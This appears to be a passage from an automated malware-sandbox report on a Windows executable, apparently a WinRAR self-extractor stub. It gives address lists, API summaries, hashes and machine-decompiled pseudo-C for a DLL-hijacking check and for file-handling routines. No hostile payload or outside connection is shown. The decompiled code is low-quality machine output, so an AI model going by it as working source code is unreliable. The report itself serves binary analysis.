                            0x009faf29
                            0x00000000
                            0x009fadd1
                            0x009fadd1
                            0x009fadd3
                            0x009fadd9
                            0x009fadda
                            0x009faddf
                            0x009fade4
                            0x009fade6
                            0x009fade8
                            0x009fadef
                            0x009fadf1
                            0x009fae05
                            0x009fae10
                            0x009fae15
                            0x009fae15
                            0x009fadef
                            0x009fae16
                            0x009fae1c
                            0x009fae6f
                            0x009fae6f
                            0x009fae70
                            0x009fae76
                            0x009fae77
                            0x00000000
                            0x009fae1e
                            0x009fae1f
                            0x009fae25
                            0x009fae2b
                            0x00000000
                            0x00000000
                            0x009fae2d
                            0x009fae34
                            0x00000000
                            0x00000000
                            0x009fae36
                            0x009fae38
                            0x009fae3e
                            0x009fae3f
                            0x009fae44
                            0x009fae4b
                            0x00000000
                            0x00000000
                            0x009fae61
                            0x009fae67
                            0x009fae69
                            0x009fa75d
                            0x009fa75d
                            0x009fa763
                            0x009fa763
                            0x009fa687
                            0x009fa688
                            0x009fafa4
                            0x009fafa4
                            0x009fafa6
                            0x009fafac
                            0x009fafb6
                            0x009fafb6
                            0x00000000
                            0x009fae69
                            0x009fae1c
                            0x009fadcb
                            0x009fa61d
                            0x009fa620
                            0x009fa634
                            0x009fa634
                            0x00000000
                            0x009fa634
                            0x009fa625
                            0x009fa625
                            0x009fa628
                            0x009fa693
                            0x009fa69a
                            0x009fa732
                            0x009fa732
                            0x009fa742
                            0x009fa748
                            0x009fa74f
                            0x009fa769
                            0x009fa770
                            0x009fa784
                            0x009fa78a
                            0x009fa791
                            0x009fa793
                            0x009fa7a5
                            0x009fa7b4
                            0x009fa7b6
                            0x009fa7b6
                            0x009fa7bc
                            0x009fa7c2
                            0x009fa7c9
                            0x009fa7e6
                            0x009fa7f3
                            0x009fa816
                            0x009fa81b
                            0x009fa81e
                            0x009fa7cb
                            0x009fa7d0
                            0x009fa7d0
                            0x009fa827
                            0x009fa82c
                            0x009fa833
                            0x009fa83c
                            0x009fa83c
                            0x009fa841
                            0x009fa84b
                            0x009fa84c
                            0x009fa84f
                            0x009fa85c
                            0x009fa85d
                            0x009fa85f
                            0x009fa872
                            0x009fa87e
                            0x009fa880
                            0x009fa883
                            0x009fa885
                            0x009fa898
                            0x009fa898
                            0x009fa89b
                            0x009fa89b
                            0x009fa8a1
                            0x009fa8a3
                            0x009fa912
                            0x009fa912
                            0x009fa916
                            0x009fab5a
                            0x009fab60
                            0x009fab6a
                            0x009fab82
                            0x009fab88
                            0x009fab95
                            0x009faba0
                            0x009faba2
                            0x009faba4
                            0x009fabaf
                            0x009fabaf
                            0x009fabb8
                            0x009fabb8
                            0x009fabbe
                            0x009fabc0
                            0x009fabc6
                            0x009fabc7
                            0x009fabcc
                            0x009fabce
                            0x009fabd4
                            0x009fabd5
                            0x009fabda
                            0x009fabdf
                            0x009fabe0
                            0x009fabe6
                            0x009fabeb
                            0x009fabed
                            0x009fabf3
                            0x009fabfa
                            0x009fabfb
                            0x009fac00
                            0x009fac07
                            0x009fac09
                            0x009fac10
                            0x009fac12
                            0x009fac19
                            0x009fac1b
                            0x009fac1d
                            0x009fac23
                            0x009fac24
                            0x009fac24
                            0x009fac19
                            0x009fac10
                            0x009fac2c
                            0x009fac31
                            0x009fac31
                            0x009fac38
                            0x00000000
                            0x009fac38
                            0x009fa91c
                            0x009fa923
                            0x009fa923
                            0x009fa926
                            0x009fa926
                            0x009fa928
                            0x009fa92c
                            0x009fa92e
                            0x009faaf0
                            0x009faaf0
                            0x009faaf4
                            0x009fab04
                            0x009fab1d
                            0x009fab2b
                            0x009fab45
                            0x009fab4a
                            0x009fab4a
                            0x009fa685
                            0x009fa685
                            0x00000000
                            0x009fa685
                            0x009fa942
                            0x009fa953
                            0x009fa959
                            0x009fa95e
                            0x009fa97b
                            0x009fa980
                            0x009fa983
                            0x009fa990
                            0x009fa997
                            0x009fa9a0
                            0x009fa9b8
                            0x009fa9bb
                            0x009fa9c2
                            0x009fa9c5
                            0x009fa9c8
                            0x009fa9d5
                            0x009fa9d7
                            0x009fa9da
                            0x009fa9dc
                            0x009faa67
                            0x009fa9e2
                            0x009fa9e2
                            0x009fa9e9
                            0x009fa9ef
                            0x009fa9f1
                            0x009fa9fe
                            0x009fa9fe
                            0x009faa0a
                            0x009faa16
                            0x009faa22
                            0x009faa2d
                            0x009faa34
                            0x009faa39
                            0x009faa57
                            0x009faa5a
                            0x009faa5f
                            0x009faa5f
                            0x009faa6e
                            0x009faa82
                            0x009faa93
                            0x009faa98
                            0x009faa9a
                            0x009faad4
                            0x009faad7
                            0x00000000
                            0x009faa9c
                            0x009faaa4
                            0x009faaaa
                            0x009faaaa
                            0x009faaaa
                            0x009faaae
                            0x009faab1
                            0x009faab1
                            0x009faab4
                            0x00000000
                            0x00000000
                            0x009faab8
                            0x009faac1
                            0x009faac2
                            0x009faac5
                            0x009faac8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009faac8
                            0x009faacd
                            0x009faada
                            0x009faada
                            0x009faade
                            0x009faae1
                            0x009faaea
                            0x009faaea
                            0x00000000
                            0x009faade
                            0x009faa9a
                            0x009fa8a5
                            0x009fa8a7
                            0x00000000
                            0x00000000
                            0x009fa8c1
                            0x009fa8c6
                            0x009fa8cf
                            0x009fa8d4
                            0x009fa8de
                            0x009fa8e0
                            0x009fa8e7
                            0x009fa8ec
                            0x009fa8ef
                            0x009fa8f1
                            0x009fa8f3
                            0x009fa8f5
                            0x009fa8f8
                            0x009fa8fa
                            0x009fa8fa
                            0x009fa8f8
                            0x009fa8fd
                            0x009fa8fd
                            0x009fa8fd
                            0x009fa907
                            0x009fa90c
                            0x00000000
                            0x009fa90c
                            0x009fa887
                            0x009fa889
                            0x009fa88c
                            0x009fa88f
                            0x00000000
                            0x00000000
                            0x009fa891
                            0x009fa893
                            0x00000000
                            0x009fa861
                            0x009fa861
                            0x009fa863
                            0x009fa866
                            0x009fa86d
                            0x009fa86f
                            0x00000000
                            0x009fa86f
                            0x009fa868
                            0x009fa86b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fa86b
                            0x009fa772
                            0x009fa774
                            0x009fa775
                            0x009fa777
                            0x009fac3d
                            0x009fac3d
                            0x009fac44
                            0x00000000
                            0x00000000
                            0x009fac4a
                            0x009fac4c
                            0x00000000
                            0x00000000
                            0x009fac57
                            0x009fac65
                            0x009fac6b
                            0x009fac71
                            0x009fac74
                            0x009fac7f
                            0x009fac89
                            0x009fac89
                            0x009fac8e
                            0x009fac91
                            0x009fac76
                            0x009fac76
                            0x009fac76
                            0x009fac9a
                            0x009faca8
                            0x00000000
                            0x009faca8
                            0x009fa770
                            0x009fa753
                            0x009fa754
                            0x009fa75b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fa75b
                            0x009fa6a0
                            0x009fa6a7
                            0x00000000
                            0x009fa6ad
                            0x009fa6ad
                            0x009fa6b4
                            0x009fa6b9
                            0x009fa6bb
                            0x009fa6ca
                            0x009fa6d2
                            0x009fa6d5
                            0x009fa724
                            0x009fa724
                            0x009fa72b
                            0x009fa72d
                            0x009fa72d
                            0x009fa6dd
                            0x009fa6e4
                            0x00000000
                            0x00000000
                            0x009fa6f3
                            0x009fa6f9
                            0x009fa6fb
                            0x00000000
                            0x009fa701
                            0x009fa706
                            0x009fa70c
                            0x009fa70e
                            0x009fa714
                            0x009fa71e
                            0x009fa71e
                            0x00000000
                            0x009fa70e
                            0x009fa6fb
                            0x00000000
                            0x009fa724
                            0x009fa6a7
                            0x009fa62a
                            0x009fa62a
                            0x009fa62d
                            0x009fa668
                            0x009fa669
                            0x009fa670
                            0x009fa676
                            0x00000000
                            0x00000000
                            0x009fa678
                            0x009fa67f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fa67f
                            0x009fa62f
                            0x009fa632
                            0x009fa64b
                            0x009fa650
                            0x009fa652
                            0x009fa65e
                            0x009fa65e
                            0x00000000
                            0x009fa652
                            0x00000000
                            0x009fa632
                            0x009fa609
                            0x009fa60b
                            0x00000000

                            APIs
                            • __EH_prolog.LIBCMT ref: 009FA5D6
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prologItemTextWindow
                            • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                            • API String ID: 810644672-3870082069
                            • Opcode ID: 40c2d36e8df80b9428b3b4441377e84320cbc54261e529bcf7048c624fd34d1a
                            • Instruction ID: df780a18e690c2c189cf6b8b5fdb63e51e4d251e148a1dcbd9c9134ee1a698f6
                            • Opcode Fuzzy Hash: 40c2d36e8df80b9428b3b4441377e84320cbc54261e529bcf7048c624fd34d1a
                            • Instruction Fuzzy Hash: A042C0B1944358BEEB21EBA4DC49FFE7BACAB45700F044064F709A61D1D7B48E46CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EFD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E009EFD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E009FD940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0xa1d080; // 0xa12884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E009EFAB1( &_a9160, E009EB943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E009EA995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E009EFCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E009EB9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E009EB98D(_t234,  &_a768);
										if(E009EA995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E009E3E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00A02B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E009EFCFD(L"dwmapi.dll");
											E009EFCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E009E3E41( &_a4852, 0x864, E009EDA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E009F9735(0,  &_a4848, E009EDA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E009EB9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E00A06662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E009EF835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E009EFCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x00a122e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x00a122e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}























                            0x009efd4e
                            0x009efd54
                            0x009efd5c
                            0x009efd67
                            0x009efd6b
                            0x009efdbe
                            0x009efdbe
                            0x009efdc3
                            0x009efdcc
                            0x009efdd1
                            0x009efdd9
                            0x009efde4
                            0x009efdec
                            0x009efdf4
                            0x009efdfc
                            0x009efe04
                            0x009efe0c
                            0x009efe14
                            0x009efe1c
                            0x009efe24
                            0x009efe2c
                            0x009efe34
                            0x009efe3c
                            0x009efe44
                            0x009efe4c
                            0x009efe54
                            0x009efe5c
                            0x009efe64
                            0x009efe6c
                            0x009efe74
                            0x009efe7c
                            0x009efe84
                            0x009efe8c
                            0x009efe94
                            0x009efe9c
                            0x009efea4
                            0x009efeaf
                            0x009efeba
                            0x009efec5
                            0x009efed0
                            0x009efedb
                            0x009efee6
                            0x009efef1
                            0x009efefc
                            0x009eff07
                            0x009eff12
                            0x009eff1d
                            0x009eff28
                            0x009eff33
                            0x009eff3e
                            0x009eff49
                            0x009eff54
                            0x009eff5f
                            0x009eff6a
                            0x009eff75
                            0x009eff80
                            0x009eff8b
                            0x009eff96
                            0x009effa1
                            0x009effac
                            0x009effb7
                            0x009effc2
                            0x009effcd
                            0x009effd8
                            0x009effe3
                            0x009effee
                            0x009efff9
                            0x009f0004
                            0x009f000f
                            0x009f001a
                            0x009f0025
                            0x009f00f3
                            0x009f00fe
                            0x009f0117
                            0x009f0122
                            0x009f0124
                            0x009f0126
                            0x009f0130
                            0x009f013d
                            0x009f013d
                            0x009f0132
                            0x009f0136
                            0x009f0136
                            0x009f0141
                            0x009f0163
                            0x009f0163
                            0x009f0174
                            0x009f0181
                            0x009f0185
                            0x009f018f
                            0x009f0193
                            0x009f0198
                            0x009f01cc
                            0x009f01cc
                            0x009f01ce
                            0x009f02e5
                            0x009f02e5
                            0x009f01dc
                            0x009f01eb
                            0x009f025a
                            0x009f0262
                            0x009f0276
                            0x009f027b
                            0x009f027e
                            0x009f0284
                            0x009f0286
                            0x009f028f
                            0x009f02a4
                            0x009f02bc
                            0x009f02c7
                            0x009f02cd
                            0x009f02cd
                            0x009f01ed
                            0x009f01f2
                            0x009f01fc
                            0x009f0208
                            0x009f0210
                            0x009f022a
                            0x009f022f
                            0x009f0249
                            0x009f0249
                            0x009f02d5
                            0x009f02d5
                            0x009f019a
                            0x009f019c
                            0x009f019c
                            0x009f01ad
                            0x009f01ba
                            0x009f01be
                            0x00000000
                            0x00000000
                            0x009f01c0
                            0x009f01c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f01c6
                            0x009f01c8
                            0x00000000
                            0x009f01c8
                            0x009f0143
                            0x009f0158
                            0x009f015e
                            0x009f0161
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f0161
                            0x009f0187
                            0x009f0187
                            0x009f0188
                            0x00000000
                            0x009f018d
                            0x009f0031
                            0x009f0033
                            0x009f0036
                            0x00000000
                            0x00000000
                            0x009f0047
                            0x009f0065
                            0x009f0069
                            0x009f00e7
                            0x009f00e8
                            0x009f00ee
                            0x00000000
                            0x009f007b
                            0x009f0090
                            0x009f0096
                            0x009f0098
                            0x00000000
                            0x00000000
                            0x009f00a0
                            0x009f00a2
                            0x009f00a7
                            0x009f00b6
                            0x009f00be
                            0x009f00dc
                            0x009f00e1
                            0x009f00e3
                            0x009f00e5
                            0x00000000
                            0x00000000
                            0x009f00c9
                            0x009f00ce
                            0x009f00da
                            0x009f00db
                            0x009f00db
                            0x00000000
                            0x009f00dc
                            0x009f0069
                            0x009efd79
                            0x009efd7b
                            0x009efd84
                            0x009efd8b
                            0x009efd8d
                            0x009efd94
                            0x009efd94
                            0x009efd9c
                            0x009efda0
                            0x009efdb0
                            0x009efdb7
                            0x009efdb9
                            0x009efdb9
                            0x00000000

                            APIs
                            • GetModuleHandleW.KERNEL32 ref: 009EFD61
                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009EFD79
                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009EFD9C
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009F0047
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009F005F
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F0071
                            • ReadFile.KERNEL32(00000000,?,00007FFE,00A128D4,00000000), ref: 009F0090
                            • CloseHandle.KERNEL32(00000000), ref: 009F00E8
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009F00FE
                            • CompareStringW.KERNELBASE(00000400,00001001,00A12920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 009F0158
                            • GetFileAttributesW.KERNELBASE(?,?,00A128EC,00000800,?,00000000,?,00000800), ref: 009F0181
                            • GetFileAttributesW.KERNEL32(?,?,00A129AC,00000800), ref: 009F01BA
                              • Part of subcall function 009EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009EFD18
                              • Part of subcall function 009EFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EE7F6,Crypt32.dll,?,009EE878,?,009EE85C,?,?,?,?), ref: 009EFD3A
                            • _swprintf.LIBCMT ref: 009F022A
                            • _swprintf.LIBCMT ref: 009F0276
                              • Part of subcall function 009E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E3E54
                            • AllocConsole.KERNEL32 ref: 009F027E
                            • GetCurrentProcessId.KERNEL32 ref: 009F0288
                            • AttachConsole.KERNEL32(00000000), ref: 009F028F
                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 009F02B5
                            • WriteConsoleW.KERNEL32(00000000), ref: 009F02BC
                            • Sleep.KERNEL32(00002710), ref: 009F02C7
                            • FreeConsole.KERNEL32 ref: 009F02CD
                            • ExitProcess.KERNEL32 ref: 009F02D5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                            • API String ID: 1201351596-3298887752
                            • Opcode ID: 134aac4e5c31a9e40c1887d29b4ccc10743c7e42f0ea29ef4f7d690490bd2e3a
                            • Instruction ID: 302bfd3fd5c7358b751ac59a49deed2b84faaebb9344503d9d857f3b65891b4d
                            • Opcode Fuzzy Hash: 134aac4e5c31a9e40c1887d29b4ccc10743c7e42f0ea29ef4f7d690490bd2e3a
                            • Instruction Fuzzy Hash: 4DD15DB1108385AAD731DF50D849BDFBBECEFC5304F50491DE6889A181CBB0C999CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FB4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E009FB4C7(void* __edx) {
				intOrPtr _t182;
				void* _t187;
				intOrPtr _t245;
				void* _t258;
				WCHAR* _t260;
				void* _t263;
				WCHAR* _t264;
				void* _t269;

				_t258 = __edx;
				E009FD870(E00A1150B, _t269);
				_t182 = 0x1bc80;
				E009FD940();
				if( *((intOrPtr*)(_t269 + 0xc)) == 0) {
					L161:
					 *[fs:0x0] =  *((intOrPtr*)(_t269 - 0xc));
					return _t182;
				}
				_push(0x1000);
				_push(_t269 - 0xe);
				_push(_t269 - 0xd);
				_push(_t269 - 0x5c84);
				_push(_t269 - 0xfc8c);
				_push( *((intOrPtr*)(_t269 + 0xc)));
				_t182 = E009FA156();
				 *((intOrPtr*)(_t269 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t245 =  *((intOrPtr*)(_t269 + 0x10));
					do {
						_t187 = _t269 - 0x5c84;
						_t263 = _t269 - 0x1bc8c;
						_t260 = 6;
						goto L4;
						L6:
						while(E009F1410(_t269 - 0xfc8c,  *((intOrPtr*)(0xa1d618 + _t264 * 4))) != 0) {
							_t264 =  &(_t264[0]);
							if(_t264 < 0xe) {
								continue;
							} else {
								goto L159;
							}
						}
						if(_t264 > 0xd) {
							goto L159;
						}
						switch( *((intOrPtr*)(_t264 * 4 +  &M009FC0D7))) {
							case 0:
								__eflags = _t245 - 2;
								if(_t245 != 2) {
									goto L159;
								}
								_t266 = 0x800;
								E009F95F8(_t269 - 0x7c84, 0x800);
								E009EA188(E009EB625(_t269 - 0x7c84, _t269 - 0x5c84, _t269 - 0xdc8c, 0x800), _t245, _t269 - 0x8c8c, 0x800);
								 *(_t269 - 4) = _t260;
								E009EA2C2(_t269 - 0x8c8c, _t269 - 0xdc8c);
								E009E6EF9(_t269 - 0x3c84);
								_push(_t260);
								_t253 = _t269 - 0x8c8c;
								_t205 = E009EA215(_t269 - 0x8c8c, _t258, _t269 - 0x3c84);
								__eflags = _t205;
								if(_t205 == 0) {
									L28:
									 *(_t269 - 4) =  *(_t269 - 4) | 0xffffffff;
									E009EA19E(_t269 - 0x8c8c);
									goto L159;
								} else {
									goto L15;
									L16:
									E009EB1B7(_t253, __eflags, _t269 - 0x7c84, _t269 - 0x103c, _t266);
									E009EAEA5(__eflags, _t269 - 0x103c, _t266);
									_t268 = E00A02B33(_t269 - 0x7c84);
									__eflags = _t268 - 4;
									if(_t268 < 4) {
										L18:
										_t233 = E009EB5E5(_t269 - 0x5c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L28;
										}
										L19:
										_t235 = E00A02B33(_t269 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t269 + _t235 * 2 - 0x3c82)) = 0;
										E009FE920(_t260, _t269 - 0x3c, _t260, 0x1e);
										_t271 = _t271 + 0x10;
										 *((intOrPtr*)(_t269 - 0x38)) = 3;
										_push(0x14);
										_pop(_t238);
										 *((short*)(_t269 - 0x2c)) = _t238;
										 *((intOrPtr*)(_t269 - 0x34)) = _t269 - 0x3c84;
										_push(_t269 - 0x3c);
										 *0xa1def4();
										goto L20;
									}
									_t243 = E00A02B33(_t269 - 0x103c);
									__eflags = _t268 - _t243;
									if(_t268 > _t243) {
										goto L19;
									}
									goto L18;
									L20:
									_t210 = GetFileAttributesW(_t269 - 0x3c84);
									__eflags = _t210 - 0xffffffff;
									if(_t210 == 0xffffffff) {
										L27:
										_push(_t260);
										_t253 = _t269 - 0x8c8c;
										_t212 = E009EA215(_t269 - 0x8c8c, _t258, _t269 - 0x3c84);
										__eflags = _t212;
										if(_t212 != 0) {
											_t266 = 0x800;
											L15:
											SetFileAttributesW(_t269 - 0x3c84, _t260);
											__eflags =  *((char*)(_t269 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t214 = DeleteFileW(_t269 - 0x3c84);
									__eflags = _t214;
									if(_t214 != 0) {
										goto L27;
									} else {
										_t267 = _t260;
										_push(_t260);
										goto L24;
										L24:
										E009E3E41(_t269 - 0x103c, 0x800, L"%s.%d.tmp", _t269 - 0x3c84);
